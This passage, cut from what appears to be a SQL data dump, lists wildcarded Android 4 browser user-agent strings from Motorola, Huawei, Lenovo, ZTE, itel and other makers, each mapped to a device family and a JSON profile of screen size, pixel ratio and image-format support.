(Linux; Android 4.*; XT914) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; XT915) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Y4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Y550-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Y635-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Y635-L01-orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Y635-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Y635-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Y635-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; YAYA Toure) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; YD206) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; YOGA Tablet 2-1050F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; YOGA Tablet 2-1050L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; YOGA Tablet 2-830F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; YU5510A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z130) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z160) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z4) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z410) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z520) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z667G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z667T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Z970) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZP980) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZP980) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE BLADE III) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade A430) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade A450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade A5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade Apex2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade C2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade C341) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade C370) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade G Lux) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade HN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade III) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade L2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade L2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade L3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade L370) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade Q Lux) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade Q) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade V2 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Blade Vec 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE E10Q) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_zte','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Geek 2 pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Geek 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Geek) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Grand S II LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE K97) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_zte','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE Kis II Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE T220) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE T221) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE T230) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE V765M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE V795) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE V811W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE V815W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ZTE-Z987) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Zera F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Zera S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Zeta) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; handheld) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; i401) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; i450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; i550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; iQ1470) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; iris353) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; iris360) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; iris510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; itel it1403+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; itel it1405) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; itel it1407) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; itel_it1503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; lcsh82_cwet_kk) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; myPhone Cube) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; myPhone_AXE_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; myPhone_Duosmart) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; onetouch EVO7) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; thl 4000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; thl 5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; thl T6 pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 